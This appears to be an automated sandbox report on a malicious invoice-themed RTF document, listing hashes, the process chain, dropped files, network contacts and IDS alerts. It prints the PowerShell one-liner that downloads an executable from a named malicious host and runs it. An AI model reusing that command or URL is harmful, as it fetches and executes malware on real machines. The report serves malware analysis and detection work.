Field | Value
---|---
File name | 2190987295 inv&PL for payment.doc
Full analysis | https://app.any.run/tasks/da05c96b-25bc-49d8-83ba-db02057d61ab
Verdict | Malicious activity
Analysis date | July 17, 2019, 15:12:20
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
Indicators | —
MIME | text/rtf
File info | Rich Text Format data, version 1, unknown character set
MD5 | B3A482D5C524FD0F0E86DF2E9066F3BA
SHA1 | 2611939B76ADEE15C3BD74DB8641CDFA9C1142D0
SHA256 | 0F6E814309DE01F579C45243A3F994A41AE146470605E484727C2306EC8DF099
SSDEEP | 96:GvpYJqKkZ4gZeZHZMZ7YhGxZUZEZaZNZVZoLZbZ9ZXZOZ5Z6ZeZHZMZyYZeZHZM8:TNC48YhGvH2sHsy9GFYs
Type | .rtf, Rich Text Format (100)

PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
3472 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2190987295 inv&PL for payment.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3668 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900
2352 | cmd.exe /c PowerShell "try{$fRt=$env:temp+'\C.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://peveyhack.com/css/page/see.exe' -Destination $fRt;(New-Object -com Shell.Application).ShellExecute( $fRt);}catch{}" | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2800 | PowerShell "try{$fRt=$env:temp+'\C.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://peveyhack.com/css/page/see.exe' -Destination $fRt;(New-Object -com Shell.Application).ShellExecute( $fRt);}catch{}" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3144 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900
3712 | "C:\Users\admin\AppData\Local\Temp\C.exe" | C:\Users\admin\AppData\Local\Temp\C.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Description: —; Exit code: 0; Version: 0.0.0.0
840 | "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\admin\AppData\Local\Temp\C.exe:Zone.Identifier" | C:\Windows\System32\cmd.exe | — | C.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2828 | "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\admin\AppData\Local\Temp\C.exe:Zone.Identifier" | C:\Windows\System32\cmd.exe | — | C.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3548 | "C:\Users\admin\AppData\Local\Temp\C.exe" | C:\Users\admin\AppData\Local\Temp\C.exe | — | C.exe | User: admin; Integrity Level: MEDIUM; Description: —; Version: 0.0.0.0

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE987.tmp.cvr | — | — | —
2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MP8LIYQXXOXQEEF1BT6Y.temp | — | — | —
3472 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 4A940B0EB7813A577FC697A20F4AA1E7 | FDEDCB8C518AD29752CCC1FA87D523F7498CAADE24F16AAE91652B3E3E387953
2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 4B92A079D7F4DFA0DFE9125E60FE7814 | E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10f1a5.TMP | binary | 4B92A079D7F4DFA0DFE9125E60FE7814 | E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$90987295 inv&PL for payment.doc | pgc | EBD3F5E5CB4B97921CEAD2A25F178854 | AD56AA25D0D55EB58712EF9062CBDA8D65442167F65DD9E548A834A067DA10B2

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---
— | — | HEAD | 200 | 103.6.196.175:80 | http://peveyhack.com/css/page/see.exe | MY | — | — | malicious
— | — | GET | 200 | 103.6.196.175:80 | http://peveyhack.com/css/page/see.exe | MY | executable | 625 Kb | malicious

PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
— | — | 103.6.196.175:80 | peveyhack.com | Exa Bytes Network Sdn.Bhd. | MY | malicious

Domain | IP | Reputation
---|---|---
peveyhack.com | — | malicious

PID | Process | Class | Message
---|---|---|---
— | — | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
— | — | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP